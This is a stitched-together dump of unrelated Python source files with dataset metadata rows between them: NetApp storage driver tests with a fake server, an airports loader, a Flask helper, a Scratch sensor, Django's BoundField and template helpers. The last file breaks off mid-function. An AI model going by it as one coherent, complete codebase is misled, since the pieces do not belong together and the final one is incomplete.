"capacity": "2147483648", "mgmtClientAttribute": 0,
"label": "CFDXJ67BLJH25DXCZFZD4NSF54",
"volumeFull": false,
"blkSize": 512, "volumeCopyTarget": false,
"volumeGroupRef":
"0400000060080E500023BB3400001F9F52CECC3F",
"preferredControllerId": "070000000000000000000001",
"currentManager": "070000000000000000000001",
"applicationTagOwned": false, "status": "optimal",
"segmentSize": 131072, "volumeUse": "standardVolume",
"action": "none", "preferredManager":
"070000000000000000000001", "volumeHandle": 15,
"offline": false, "preReadRedundancyCheckEnabled": false,
"dssPreallocEnabled": false, "name": "bdm-vc-test-1",
"worldWideName": "60080E500023BB3400001FC352D14CB2",
"currentControllerId": "070000000000000000000001",
"protectionInformationCapable": false, "mapped": false,
"reconPriority": 1, "protectionType":
"type1Protection"}""")
text_json['label'] = data['name']
text_json['name'] = data['name']
text_json['volumeRef'] = data['name']
text_json['id'] = data['name']
response.text = json.dumps(text_json)
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volume-mappings$", path):
response.status_code = 200
text_json = json.loads("""
{
"lunMappingRef":"8800000000000000000000000000000000000000",
"lun": 0,
"ssid": 16384,
"perms": 15,
"volumeRef": "0200000060080E500023BB34000003FB515C2293",
"type": "all",
"mapRef": "8400000060080E500023C73400300381515BFBA3"
}
""")
text_json['volumeRef'] = data['mappableObjectId']
text_json['mapRef'] = data['targetId']
response.text = json.dumps(text_json)
elif re.match("^/storage-systems/[0-9a-zA-Z]+/hosts$", path):
response.status_code = 200
response.text = """{"isSAControlled": false,
"confirmLUNMappingCreation"
: false, "label": "stlrx300s7-55", "isLargeBlockFormatHost":
false, "clusterRef": "8500000060080E500023C7340036035F515B78FC",
"protectionInformationCapableAccessMethod": false,
"ports": [], "hostRef":
"8400000060080E500023C73400300381515BFBA3", "hostTypeIndex": 10,
"hostSidePorts": [{"label": "NewStore", "type": "iscsi",
"address": "iqn.1998-01.com.vmware:localhost-28a58148"}]}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-groups$", path):
response.status_code = 200
text_json = json.loads("""{"status": "optimal",
"autoDeleteLimit": 0,
"maxRepositoryCapacity": "-65536", "rollbackStatus": "none"
, "unusableRepositoryCapacity": "0", "pitGroupRef":
"3300000060080E500023C7340000098D5294AC9A", "clusterSize":
65536, "label": "C6JICISVHNG2TFZX4XB5ZWL7O",
"maxBaseCapacity":
"476187142128128", "repositoryVolume":
"3600000060080E500023BB3400001FA952CEF12C",
"fullWarnThreshold": 99, "repFullPolicy": "purgepit",
"action": "none", "rollbackPriority": "medium",
"creationPendingStatus": "none", "consistencyGroupRef":
"0000000000000000000000000000000000000000", "volumeHandle":
49153, "consistencyGroup": false, "baseVolume":
"0200000060080E500023C734000009825294A534"}""")
text_json['label'] = data['name']
text_json['name'] = data['name']
text_json['pitGroupRef'] = data['name']
text_json['id'] = data['name']
text_json['baseVolume'] = data['baseMappableObjectId']
response.text = json.dumps(text_json)
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-images$", path):
response.status_code = 200
text_json = json.loads("""{"status": "optimal",
"pitCapacity": "2147483648",
"pitTimestamp": "1389315375", "pitGroupRef":
"3300000060080E500023C7340000098D5294AC9A", "creationMethod":
"user", "repositoryCapacityUtilization": "2818048",
"activeCOW": true, "isRollbackSource": false, "pitRef":
"3400000060080E500023BB3400631F335294A5A8",
"pitSequenceNumber": "19"}""")
text_json['label'] = data['groupId']
text_json['name'] = data['groupId']
text_json['id'] = data['groupId']
text_json['pitGroupRef'] = data['groupId']
response.text = json.dumps(text_json)
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-volumes$",
path):
response.status_code = 200
text_json = json.loads("""{"unusableRepositoryCapacity": "0",
"totalSizeInBytes":
"-1", "worldWideName": "60080E500023BB3400001FAD52CEF2F5",
"boundToPIT": true, "wwn":
"60080E500023BB3400001FAD52CEF2F5", "id":
"3500000060080E500023BB3400001FAD52CEF2F5",
"baseVol": "0200000060080E500023BB3400001FA352CECCAE",
"label": "bdm-pv-1", "volumeFull": false,
"preferredControllerId": "070000000000000000000001", "offline":
false, "viewSequenceNumber": "10", "status": "optimal",
"viewRef": "3500000060080E500023BB3400001FAD52CEF2F5",
"mapped": false, "accessMode": "readOnly", "viewTime":
"1389315613", "repositoryVolume":
"0000000000000000000000000000000000000000", "preferredManager":
"070000000000000000000001", "volumeHandle": 16385,
"currentManager": "070000000000000000000001",
"maxRepositoryCapacity": "0", "name": "bdm-pv-1",
"fullWarnThreshold": 0, "currentControllerId":
"070000000000000000000001", "basePIT":
"3400000060080E500023BB3400631F335294A5A8", "clusterSize":
0, "mgmtClientAttribute": 0}""")
text_json['label'] = data['name']
text_json['name'] = data['name']
text_json['id'] = data['name']
text_json['basePIT'] = data['snapshotImageId']
text_json['baseVol'] = data['baseMappableObjectId']
response.text = json.dumps(text_json)
elif re.match("^/storage-systems$", path):
response.status_code = 200
response.text = """{"freePoolSpace": "17055871480319",
"driveCount": 24,
"wwn": "60080E500023C73400000000515AF323", "id": "1",
"hotSpareSizeAsString": "0", "hostSparesUsed": 0, "types": "",
"hostSpareCountInStandby": 0, "status": "optimal", "trayCount":
1, "usedPoolSpaceAsString": "37452115456", "ip2":
"10.63.165.216", "ip1": "10.63.165.215",
"freePoolSpaceAsString": "17055871480319", "hotSpareCount": 0,
"hotSpareSize": "0", "name": "stle2600-7_8", "usedPoolSpace":
"37452115456", "driveTypes": ["sas"],
"unconfiguredSpaceByDriveType": {}, "unconfiguredSpaceAsStrings":
"0", "model": "2650", "unconfiguredSpace": "0"}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+$",
path):
response.status_code = 200
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volume-copy-jobs$",
path):
response.status_code = 200
response.text = """{"status": "complete", "cloneCopy": true,
"pgRef":
"3300000060080E500023C73400000ACA52D29454", "volcopyHandle":49160
, "idleTargetWriteProt": true, "copyPriority": "priority2",
"volcopyRef": "1800000060080E500023C73400000ACF52D29466",
"worldWideName": "60080E500023C73400000ACF52D29466",
"copyCompleteTime": "0", "sourceVolume":
"3500000060080E500023C73400000ACE52D29462", "currentManager":
"070000000000000000000002", "copyStartTime": "1389551671",
"reserved1": "00000000", "targetVolume":
"0200000060080E500023C73400000A8C52D10675"}"""
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volumes/[0-9A-Za-z]+$",
path):
response.status_code = 200
response.text = """{"extremeProtection": false,
"pitBaseVolume": true,
"dssMaxSegmentSize": 131072,
"totalSizeInBytes": "1073741824", "raidLevel": "raid6",
"volumeRef": "0200000060080E500023BB34000003FB515C2293",
"listOfMappings": [], "sectorOffset": "15",
"id": "0200000060080E500023BB34000003FB515C2293",
"wwn": "60080E500023BB3400001FC352D14CB2",
"capacity": "2147483648", "mgmtClientAttribute": 0,
"label": "rename",
"volumeFull": false,
"blkSize": 512, "volumeCopyTarget": false,
"volumeGroupRef":
"0400000060080E500023BB3400001F9F52CECC3F",
"preferredControllerId": "070000000000000000000001",
"currentManager": "070000000000000000000001",
"applicationTagOwned": false, "status": "optimal",
"segmentSize": 131072, "volumeUse": "standardVolume",
"action": "none", "preferredManager":
"070000000000000000000001", "volumeHandle": 15,
"offline": false, "preReadRedundancyCheckEnabled": false,
"dssPreallocEnabled": false, "name": "bdm-vc-test-1",
"worldWideName": "60080E500023BB3400001FC352D14CB2",
"currentControllerId": "070000000000000000000001",
"protectionInformationCapable": false, "mapped": false,
"reconPriority": 1, "protectionType":
"type1Protection"}"""
else:
# Unknown API
response.status_code = 500
return response
def do_DELETE(self, path, params, data, headers):
"""Respond to a DELETE request."""
response = FakeEseriesResponse()
if "/devmgr/vn" not in path:
response.status_code = 500
(__, ___, path) = path.partition("/devmgr/vn")
if re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-images"
"/[0-9A-Za-z]+$", path):
code = 204
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-groups"
"/[0-9A-Za-z]+$", path):
code = 204
elif re.match("^/storage-systems/[0-9a-zA-Z]+/snapshot-volumes"
"/[0-9A-Za-z]+$", path):
code = 204
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volume-copy-jobs"
"/[0-9A-Za-z]+$", path):
code = 204
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volumes"
"/[0-9A-Za-z]+$", path):
code = 204
elif re.match("^/storage-systems/[0-9a-zA-Z]+/volume-mappings/"
"[0-9a-zA-Z]+$", path):
code = 204
else:
code = 500
response.status_code = code
return response
class FakeEseriesHTTPSession(object):
"""A fake requests.Session for netapp tests.
"""
def __init__(self):
self.handler = FakeEseriesServerHandler()
def request(self, method, url, params, data, headers, timeout, verify):
address = '127.0.0.1:80'
(__, ___, path) = url.partition(address)
if method.upper() == 'GET':
return self.handler.do_GET(path, params, data, headers)
elif method.upper() == 'POST':
return self.handler.do_POST(path, params, data, headers)
elif method.upper() == 'DELETE':
return self.handler.do_DELETE(path, params, data, headers)
else:
raise exception.Invalid()
class NetAppEseriesIscsiDriverTestCase(test.TestCase):
"""Test case for NetApp e-series iscsi driver."""
volume = {'id': '114774fb-e15a-4fae-8ee2-c9723e3645ef', 'size': 1,
'volume_name': 'lun1',
'os_type': 'linux', 'provider_location': 'lun1',
'id': '114774fb-e15a-4fae-8ee2-c9723e3645ef',
'provider_auth': 'provider a b', 'project_id': 'project',
'display_name': None, 'display_description': 'lun1',
'volume_type_id': None}
snapshot = {'id': '17928122-553b-4da9-9737-e5c3dcd97f75',
'volume_id': '114774fb-e15a-4fae-8ee2-c9723e3645ef',
'size': 2, 'volume_name': 'lun1',
'volume_size': 2, 'project_id': 'project',
'display_name': None, 'display_description': 'lun1',
'volume_type_id': None}
volume_sec = {'id': 'b6c01641-8955-4917-a5e3-077147478575',
'size': 2, 'volume_name': 'lun1',
'os_type': 'linux', 'provider_location': 'lun1',
'id': 'b6c01641-8955-4917-a5e3-077147478575',
'provider_auth': None, 'project_id': 'project',
'display_name': None, 'display_description': 'lun1',
'volume_type_id': None}
volume_clone = {'id': 'b4b24b27-c716-4647-b66d-8b93ead770a5', 'size': 3,
'volume_name': 'lun1',
'os_type': 'linux', 'provider_location': 'cl_sm',
'id': 'b4b24b27-c716-4647-b66d-8b93ead770a5',
'provider_auth': None,
'project_id': 'project', 'display_name': None,
'display_description': 'lun1',
'volume_type_id': None}
volume_clone_large = {'id': 'f6ef5bf5-e24f-4cbb-b4c4-11d631d6e553',
'size': 6, 'volume_name': 'lun1',
'os_type': 'linux', 'provider_location': 'cl_lg',
'id': 'f6ef5bf5-e24f-4cbb-b4c4-11d631d6e553',
'provider_auth': None,
'project_id': 'project', 'display_name': None,
'display_description': 'lun1',
'volume_type_id': None}
connector = {'initiator': 'iqn.1998-01.com.vmware:localhost-28a58148'}
def setUp(self):
super(NetAppEseriesIscsiDriverTestCase, self).setUp()
self._custom_setup()
def _custom_setup(self):
configuration = self._set_config(create_configuration())
self.driver = common.NetAppDriver(configuration=configuration)
requests.Session = mock.Mock(wraps=FakeEseriesHTTPSession)
self.driver.do_setup(context='context')
self.driver.check_for_setup_error()
def _set_config(self, configuration):
configuration.netapp_storage_family = 'eseries'
configuration.netapp_storage_protocol = 'iscsi'
configuration.netapp_transport_type = 'http'
configuration.netapp_server_hostname = '127.0.0.1'
configuration.netapp_server_port = '80'
configuration.netapp_webservice_path = '/devmgr/vn'
configuration.netapp_controller_ips = '127.0.0.2,127.0.0.3'
configuration.netapp_sa_password = 'pass1234'
configuration.netapp_login = 'rw'
configuration.netapp_password = 'rw'
configuration.netapp_storage_pools = 'DDP'
return configuration
def test_embedded_mode(self):
configuration = self._set_config(create_configuration())
configuration.netapp_controller_ips = '127.0.0.1,127.0.0.3'
driver = common.NetAppDriver(configuration=configuration)
driver.do_setup(context='context')
self.assertEqual(driver._client.get_system_id(),
'1fa6efb5-f07b-4de4-9f0e-52e5f7ff5d1b')
def test_check_system_pwd_not_sync(self):
def list_system():
if getattr(self, 'test_count', None):
self.test_count = 1
return {'status': 'passwordoutofsync'}
return {'status': 'needsAttention'}
self.driver._client.list_storage_system = mock.Mock(wraps=list_system)
result = self.driver._check_storage_system()
self.assertTrue(result)
def test_connect(self):
self.driver.check_for_setup_error()
def test_create_destroy(self):
self.driver.create_volume(self.volume)
self.driver.delete_volume(self.volume)
def test_create_vol_snapshot_destroy(self):
self.driver.create_volume(self.volume)
self.driver.create_snapshot(self.snapshot)
self.driver.create_volume_from_snapshot(self.volume_sec, self.snapshot)
self.driver.delete_snapshot(self.snapshot)
self.driver.delete_volume(self.volume)
def test_map_unmap(self):
self.driver.create_volume(self.volume)
connection_info = self.driver.initialize_connection(self.volume,
self.connector)
self.assertEqual(connection_info['driver_volume_type'], 'iscsi')
properties = connection_info.get('data')
self.assertIsNotNone(properties, 'Target portal is none')
self.driver.terminate_connection(self.volume, self.connector)
self.driver.delete_volume(self.volume)
def test_map_already_mapped_same_host(self):
self.driver.create_volume(self.volume)
maps = [{'lunMappingRef': 'hdkjsdhjsdh',
'mapRef': '8400000060080E500023C73400300381515BFBA3',
'volumeRef': 'CFDXJ67BLJH25DXCZFZD4NSF54',
'lun': 2}]
self.driver._get_host_mapping_for_vol_frm_array = mock.Mock(
return_value=maps)
self.driver._get_free_lun = mock.Mock()
info = self.driver.initialize_connection(self.volume, self.connector)
self.assertEqual(
self.driver._get_host_mapping_for_vol_frm_array.call_count, 1)
self.assertEqual(self.driver._get_free_lun.call_count, 0)
self.assertEqual(info['driver_volume_type'], 'iscsi')
properties = info.get('data')
self.assertIsNotNone(properties, 'Target portal is none')
self.driver.terminate_connection(self.volume, self.connector)
self.driver.delete_volume(self.volume)
def test_map_already_mapped_diff_host(self):
self.driver.create_volume(self.volume)
maps = [{'lunMappingRef': 'hdkjsdhjsdh',
'mapRef': '7400000060080E500023C73400300381515BFBA3',
'volumeRef': 'CFDXJ67BLJH25DXCZFZD4NSF54',
'lun': 2}]
self.driver._get_host_mapping_for_vol_frm_array = mock.Mock(
return_value=maps)
self.driver._get_vol_mapping_for_host_frm_array = mock.Mock(
return_value=[])
self.driver._get_free_lun = mock.Mock(return_value=0)
self.driver._del_vol_mapping_frm_cache = mock.Mock()
info = self.driver.initialize_connection(self.volume, self.connector)
self.assertEqual(
self.driver._get_vol_mapping_for_host_frm_array.call_count, 1)
self.assertEqual(
self.driver._get_host_mapping_for_vol_frm_array.call_count, 1)
self.assertEqual(self.driver._get_free_lun.call_count, 1)
self.assertEqual(self.driver._del_vol_mapping_frm_cache.call_count, 1)
self.assertEqual(info['driver_volume_type'], 'iscsi')
properties = info.get('data')
self.assertIsNotNone(properties, 'Target portal is none')
self.driver.terminate_connection(self.volume, self.connector)
self.driver.delete_volume(self.volume)
def test_cloned_volume_destroy(self):
self.driver.create_volume(self.volume)
self.driver.create_cloned_volume(self.snapshot, self.volume)
self.driver.delete_volume(self.volume)
def test_map_by_creating_host(self):
self.driver.create_volume(self.volume)
connector_new = {'initiator': 'iqn.1993-08.org.debian:01:1001'}
connection_info = self.driver.initialize_connection(self.volume,
connector_new)
self.assertEqual(connection_info['driver_volume_type'], 'iscsi')
properties = connection_info.get('data')
self.assertIsNotNone(properties, 'Target portal is none')
def test_vol_stats(self):
self.driver.get_volume_stats(refresh=True)
def test_create_vol_snapshot_diff_size_resize(self):
self.driver.create_volume(self.volume)
self.driver.create_snapshot(self.snapshot)
self.driver.create_volume_from_snapshot(
self.volume_clone, self.snapshot)
self.driver.delete_snapshot(self.snapshot)
self.driver.delete_volume(self.volume)
def test_create_vol_snapshot_diff_size_subclone(self):
self.driver.create_volume(self.volume)
self.driver.create_snapshot(self.snapshot)
self.driver.create_volume_from_snapshot(
self.volume_clone_large, self.snapshot)
self.driver.delete_snapshot(self.snapshot)
self.driver.delete_volume(self.volume)
|
apache-2.0
| -8,592,145,727,235,885,000 | 49.906292 | 79 | 0.563494 | false |
flopp/airports_map
|
airports/db.py
|
1
|
3270
|
import os
import random
import typing
from airports.airport import Airport, AirportType
from airports.airportstable import AirportsTable
from airports.download import download
from airports.runwaystable import RunwaysTable
from airports.wikipediahelper import get_wikipedia_articles
class DB:
def __init__(self) -> None:
self._airports: typing.Dict[str, Airport] = {}
self._large: typing.List[str] = []
self._medium: typing.List[str] = []
self._small: typing.List[str] = []
self._other: typing.List[str] = []
def load(self, cache_dir: str, reset_cache: bool) -> None:
airports_csv = os.path.join(cache_dir, "airports.csv")
runways_csv = os.path.join(cache_dir, "runways.csv")
wikipedia_json = os.path.join(cache_dir, "wikipedia_json")
if reset_cache:
for file_name in [airports_csv, runways_csv, wikipedia_json]:
if os.path.exists(file_name):
os.remove(file_name)
airports = AirportsTable(download("https://ourairports.com/data/airports.csv", airports_csv))
runways = RunwaysTable(download("https://ourairports.com/data/runways.csv", runways_csv))
articles = get_wikipedia_articles(wikipedia_json)
airports.add_wikipedia(articles)
airports.compute_bounds(runways.to_dict())
airports.check()
for airport in airports.good_airports():
self._airports[airport.icao_code()] = airport
if airport.airport_type() == AirportType.LARGE_AIRPORT:
self._large.append(airport.icao_code())
elif airport.airport_type() == AirportType.MEDIUM_AIRPORT:
self._medium.append(airport.icao_code())
elif airport.airport_type() == AirportType.SMALL_AIRPORT:
self._small.append(airport.icao_code())
else:
self._other.append(airport.icao_code())
def get_all_icaos(self) -> typing.List[str]:
return list(self._airports.keys())
def get(self, icao: str) -> typing.Optional[Airport]:
icao = icao.strip().upper()
if icao in self._airports:
return self._airports[icao]
return None
def get_random(self) -> Airport:
if random.choice([True, False]):
return self._airports[random.choice(self._large)]
if random.choice([True, False]):
return self._airports[random.choice(self._medium)]
if random.choice([True, False]):
return self._airports[random.choice(self._small)]
return self._airports[random.choice(list(self._airports.keys()))]
def get_random_list(self, count: int) -> typing.List[Airport]:
return random.sample(list(self._airports.values()), count)
def search(self, needle: str) -> typing.Optional[Airport]:
needle = needle.strip().upper()
for airport in self._airports.values():
if airport.matches_code(needle):
return airport
for airport in self._airports.values():
if airport.matches_name(needle):
return airport
for airport in self._airports.values():
if airport.matches_location(needle):
return airport
return None
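# Illustrative usage sketch (added; the cache directory and query string are
# assumptions, not part of this module):
#
#     db = DB()
#     db.load(cache_dir=".cache", reset_cache=False)
#     airport = db.search("FRA") or db.get_random()
#     print(airport.icao_code())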
|
mit
| -1,287,605,393,672,882,000 | 41.467532 | 101 | 0.62263 | false |
Vito2015/tcc3-portal
|
tcc3portal/tcc_frontend/__init__.py
|
1
|
1994
|
# coding:utf-8
"""
tcc3portal.tcc_frontend
~~~~~~~~~~~~~~~~~~~
tcc3portal tcc_frontend ui templates package.
:copyright: (c) 2015 by Vito.
:license: GNU, see LICENSE for more details.
"""
from flask import Blueprint, Flask, url_for, current_app
def tcc_frontend_find_resource(filename, cdn, local=True):
"""Resource finding function, also available in templates."""
cdns = current_app.extensions['tcc_frontend']['cdns']
resource_url = cdns[cdn].get_resource_url(filename)
return resource_url
def get_app_config(variable_name):
try:
return current_app.config[variable_name]
except KeyError:
return None
class StaticCDN(object):
"""A CDN that serves content from the local application.
:param static_endpoint: Endpoint to use.
"""
def __init__(self, static_endpoint='static'):
self.static_endpoint = static_endpoint
def get_resource_url(self, filename):
extra_args = {}
return url_for(self.static_endpoint, filename=filename, **extra_args)
class TccFrontend(object):
def __init__(self, app):
if app is not None:
self.init_app(app)
def init_app(self, app):
""" Init Flask app.
:type app: Flask
"""
blueprint = Blueprint('tcc_frontend',
__name__,
static_folder="static",
template_folder="templates",
static_url_path=app.static_url_path+'/tcc_frontend')
app.register_blueprint(blueprint)
app.jinja_env.globals['tcc_frontend_find_resource'] =\
tcc_frontend_find_resource
local = StaticCDN('tcc_frontend.static')
static = StaticCDN()
app.extensions['tcc_frontend'] = {
'cdns': {
'local': local,
'static': static,
},
}
app.jinja_env.globals['get_app_config'] = get_app_config
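# --- Usage sketch (added for illustration) ---
# Wires the blueprint into a throw-away Flask app; the CSS filename passed to
# tcc_frontend_find_resource below is an assumption, not a file shipped here.
if __name__ == "__main__":
    app = Flask(__name__)
    TccFrontend(app)
    with app.test_request_context():
        # Resolves against the blueprint's static endpoint registered above.
        print(tcc_frontend_find_resource("css/tcc.css", cdn="local"))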
|
gpl-2.0
| 6,461,207,089,957,628,000 | 27.084507 | 82 | 0.575727 | false |
wendlers/scratch-pynetsense
|
example-src/WrappedRemoteSensor.py
|
1
|
2457
|
##
# This file is part of the Scratch Remote Sensor (SRS) Library project
#
# Copyright (C) 2012 Stefan Wendler <[email protected]>
#
# The SRS Library is free software; you can redistribute
# it and/or modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# SRS Library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with the JSherpa firmware; if not, write to the Free
# Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA
# 02111-1307 USA.
##
'''
This file is part of the Scratch Remote Sensor Library project
'''
import time
import socket
import logging
from scratch.remotesensor import RemoteSensor, DEFAULT_HOST, DEFAULT_PORT
class WrappedRemoteSensor(RemoteSensor):
'''
    This example shows how to write a basic wrapped remote sensor. It reads
"/proc/meminfo" and parses out the values for "memtotal" and "memfree".
    Each time one of these values changes, a sensor-update is sent to the
server.
To start this sensor, pass it as a wrapper to the wrapper daemon:
source setenv.sh
python src/scratch/wrappers/daemon.py --foreground --loglevel DEBUG \
--wrap WrappedRemoteSensor#WrappedRemoteSensor start
'''
__args = None
# name used e.g. for heartbeat
name = "wrap"
def __init__(self, myArgs = {}):
'''
Create a new instance of the monitoring remote sensor.
@param myArgs arguments for the sensor: host and port.
'''
RemoteSensor.__init__(self, args = myArgs)
def worker(self):
'''
Read memory info from proc filesystem (memtotal and memfree). If the
value changed, send a sensor-update message to the server.
'''
try:
f = open('/proc/meminfo', 'r')
lines = f.readlines()
f.close()
changed = False
for l in lines:
w = l.split(':')
k = w[0].strip().lower()
v = int(w[1].strip().split(' ')[0])
                # these are the only fields we are interested in
if k in [ 'memtotal', 'memfree']:
if self.values.set(k, v):
changed = True
if changed:
self.bcastMsg('input-changed')
except Exception as e:
logging.error(e)
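# --- Standalone sketch (added for illustration). Normally this sensor is
# launched through the wrapper daemon shown in the class docstring; running it
# directly assumes a Scratch remote-sensor server is reachable with the
# defaults baked into RemoteSensor, which is not verified here.
if __name__ == "__main__":
    logging.basicConfig(level=logging.DEBUG)
    sensor = WrappedRemoteSensor()
    while True:
        sensor.worker()
        time.sleep(1)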
|
lgpl-2.1
| -1,918,675,807,934,093,300 | 26.606742 | 74 | 0.699634 | false |
letouriste001/SmartForest_2.0
|
python3.4Smartforest/lib/python3.4/site-packages/django/forms/boundfield.py
|
1
|
8691
|
from __future__ import unicode_literals
import datetime
from django.forms.utils import flatatt, pretty_name
from django.forms.widgets import Textarea, TextInput
from django.utils import six
from django.utils.encoding import (
force_text, python_2_unicode_compatible, smart_text,
)
from django.utils.html import conditional_escape, format_html, html_safe
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
__all__ = ('BoundField',)
UNSET = object()
@html_safe
@python_2_unicode_compatible
class BoundField(object):
"A Field plus data"
def __init__(self, form, field, name):
self.form = form
self.field = field
self.name = name
self.html_name = form.add_prefix(name)
self.html_initial_name = form.add_initial_prefix(name)
self.html_initial_id = form.add_initial_prefix(self.auto_id)
if self.field.label is None:
self.label = pretty_name(name)
else:
self.label = self.field.label
self.help_text = field.help_text or ''
self._initial_value = UNSET
def __str__(self):
"""Renders this field as an HTML widget."""
if self.field.show_hidden_initial:
return self.as_widget() + self.as_hidden(only_initial=True)
return self.as_widget()
def __iter__(self):
"""
Yields rendered strings that comprise all widgets in this BoundField.
This really is only useful for RadioSelect widgets, so that you can
iterate over individual radio buttons in a template.
"""
id_ = self.field.widget.attrs.get('id') or self.auto_id
attrs = {'id': id_} if id_ else {}
for subwidget in self.field.widget.subwidgets(self.html_name, self.value(), attrs):
yield subwidget
def __len__(self):
return len(list(self.__iter__()))
def __getitem__(self, idx):
# Prevent unnecessary reevaluation when accessing BoundField's attrs
# from templates.
if not isinstance(idx, six.integer_types + (slice,)):
raise TypeError
return list(self.__iter__())[idx]
@property
def errors(self):
"""
Returns an ErrorList for this field. Returns an empty ErrorList
if there are none.
"""
return self.form.errors.get(self.name, self.form.error_class())
def as_widget(self, widget=None, attrs=None, only_initial=False):
"""
Renders the field by rendering the passed widget, adding any HTML
attributes passed as attrs. If no widget is specified, then the
field's default widget will be used.
"""
if not widget:
widget = self.field.widget
if self.field.localize:
widget.is_localized = True
attrs = attrs or {}
if self.field.disabled:
attrs['disabled'] = True
auto_id = self.auto_id
if auto_id and 'id' not in attrs and 'id' not in widget.attrs:
if not only_initial:
attrs['id'] = auto_id
else:
attrs['id'] = self.html_initial_id
if not only_initial:
name = self.html_name
else:
name = self.html_initial_name
return force_text(widget.render(name, self.value(), attrs=attrs))
def as_text(self, attrs=None, **kwargs):
"""
Returns a string of HTML for representing this as an <input type="text">.
"""
return self.as_widget(TextInput(), attrs, **kwargs)
def as_textarea(self, attrs=None, **kwargs):
"Returns a string of HTML for representing this as a <textarea>."
return self.as_widget(Textarea(), attrs, **kwargs)
def as_hidden(self, attrs=None, **kwargs):
"""
Returns a string of HTML for representing this as an <input type="hidden">.
"""
return self.as_widget(self.field.hidden_widget(), attrs, **kwargs)
@property
def data(self):
"""
Returns the data for this BoundField, or None if it wasn't given.
"""
return self.field.widget.value_from_datadict(self.form.data, self.form.files, self.html_name)
def value(self):
"""
Returns the value for this BoundField, using the initial value if
the form is not bound or the data otherwise.
"""
if not self.form.is_bound:
data = self.form.initial.get(self.name, self.field.initial)
if callable(data):
if self._initial_value is not UNSET:
data = self._initial_value
else:
data = data()
# If this is an auto-generated default date, nix the
# microseconds for standardized handling. See #22502.
if (isinstance(data, (datetime.datetime, datetime.time)) and
not self.field.widget.supports_microseconds):
data = data.replace(microsecond=0)
self._initial_value = data
else:
data = self.field.bound_data(
self.data, self.form.initial.get(self.name, self.field.initial)
)
return self.field.prepare_value(data)
def label_tag(self, contents=None, attrs=None, label_suffix=None):
"""
Wraps the given contents in a <label>, if the field has an ID attribute.
contents should be 'mark_safe'd to avoid HTML escaping. If contents
aren't given, uses the field's HTML-escaped label.
If attrs are given, they're used as HTML attributes on the <label> tag.
label_suffix allows overriding the form's label_suffix.
"""
contents = contents or self.label
if label_suffix is None:
label_suffix = (self.field.label_suffix if self.field.label_suffix is not None
else self.form.label_suffix)
# Only add the suffix if the label does not end in punctuation.
# Translators: If found as last label character, these punctuation
        # characters will prevent the default label_suffix from being appended to the label
if label_suffix and contents and contents[-1] not in _(':?.!'):
contents = format_html('{}{}', contents, label_suffix)
widget = self.field.widget
id_ = widget.attrs.get('id') or self.auto_id
if id_:
id_for_label = widget.id_for_label(id_)
if id_for_label:
attrs = dict(attrs or {}, **{'for': id_for_label})
if self.field.required and hasattr(self.form, 'required_css_class'):
attrs = attrs or {}
if 'class' in attrs:
attrs['class'] += ' ' + self.form.required_css_class
else:
attrs['class'] = self.form.required_css_class
attrs = flatatt(attrs) if attrs else ''
contents = format_html('<label{}>{}</label>', attrs, contents)
else:
contents = conditional_escape(contents)
return mark_safe(contents)
def css_classes(self, extra_classes=None):
"""
Returns a string of space-separated CSS classes for this field.
"""
if hasattr(extra_classes, 'split'):
extra_classes = extra_classes.split()
extra_classes = set(extra_classes or [])
if self.errors and hasattr(self.form, 'error_css_class'):
extra_classes.add(self.form.error_css_class)
if self.field.required and hasattr(self.form, 'required_css_class'):
extra_classes.add(self.form.required_css_class)
return ' '.join(extra_classes)
@property
def is_hidden(self):
"Returns True if this BoundField's widget is hidden."
return self.field.widget.is_hidden
@property
def auto_id(self):
"""
Calculates and returns the ID attribute for this BoundField, if the
associated Form has specified auto_id. Returns an empty string otherwise.
"""
auto_id = self.form.auto_id
if auto_id and '%s' in smart_text(auto_id):
return smart_text(auto_id) % self.html_name
elif auto_id:
return self.html_name
return ''
@property
def id_for_label(self):
"""
Wrapper around the field widget's `id_for_label` method.
Useful, for example, for focusing on this field regardless of whether
it has a single widget or a MultiWidget.
"""
widget = self.field.widget
id_ = widget.attrs.get('id') or self.auto_id
return widget.id_for_label(id_)
|
mit
| -1,490,052,181,959,970,800 | 37.286344 | 101 | 0.594638 | false |
AlexanderPease/viv
|
app/ui_methods.py
|
1
|
2070
|
# Just for ordinalizing the district number
def ordinal(numb):
if type(numb) is str:
numb = int(float(numb))
if numb < 20: #determining suffix for < 20
if numb == 1:
suffix = 'st'
elif numb == 2:
suffix = 'nd'
elif numb == 3:
suffix = 'rd'
else:
suffix = 'th'
else: #determining suffix for > 20
tens = str(numb)
tens = tens[-2]
unit = str(numb)
unit = unit[-1]
if tens == "1":
suffix = "th"
else:
if unit == "1":
suffix = 'st'
elif unit == "2":
suffix = 'nd'
elif unit == "3":
suffix = 'rd'
else:
suffix = 'th'
return str(numb)+ suffix
def list_to_comma_delimited_string(list_arg):
"""
    Takes a list and turns it into a comma-delimited string.
Used for turning Group.invited_emails into correct form for template display.
Args:
list: A list, ex: ["[email protected]", "[email protected]"] or Group.users
Returns
A string , ex: "[email protected], [email protected]"
"""
long_string = ""
for item in list_arg:
long_string += str(item) + ", "
long_string = long_string[0:-2] # Remove last ", "
return long_string
def get_domain(email):
"""
Returns just the domain name of an email address
Ex: reply.craigslist.com from [email protected]
"""
return email.split('@')[1]
def email_obscure(email):
"""
Obscures an email address
Args:
email: A string, ex: [email protected]
Returns
A string , ex: t*******@alexanderpease.com
"""
first_letter = email[0]
string_split = email.split('@')
obscured = ""
while len(obscured) < len(string_split[0])-1:
